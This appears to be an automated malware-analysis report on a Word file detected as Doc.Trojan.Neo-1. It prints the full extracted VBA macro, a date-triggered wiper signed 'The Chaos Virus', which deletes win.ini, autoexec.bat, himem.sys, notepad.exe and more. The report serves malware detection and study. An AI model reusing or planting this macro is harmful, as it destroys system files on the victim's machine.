MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK: T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The 'Form_Load' subroutine within the macros attempts to delete several critical system files including 'c:\windows\win.ini', 'c:\autoexec.bat', 'c:\windows\himem.sys', and 'c:\windows\notepad.exe'. This behavior is indicative of a destructive payload, commonly associated with wipers or destructive malware.
Heuristics (2)
- ClamAV: Doc.Trojan.Neo-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Neo-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 744 bytes |

SHA-256: fcec8c8f72db10aa8687c8134eafff21d9bf441ce5640f9abf505fabf56b5b13
Detection (ClamAV): Doc.Trojan.Neo-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Form_Load()
form1.Hide
If Date$ > "07-04-2000" Then GoTo del Else If Year(Now) > 1999 Then End Else Date$ = "05-30-1999"
End
del:
file1 = "c:\windows\win.ini"
file2 = "c:\autoexec.bat"
file3 = "c:\windows\himem.sys"
file4 = "c:\windows\notepad.exe"
file5 = "c:\"
On Error Resume Next
SetAttr file1, 0
SetAttr file2, 0
SetAttr file3, 0
SetAttr file4, 0
SetAttr file5, 0
Kill file1
Kill file2
Kill file3
Kill file4
Kill file5
End
'The Chaos Virus
'By: Neo
End Sub
```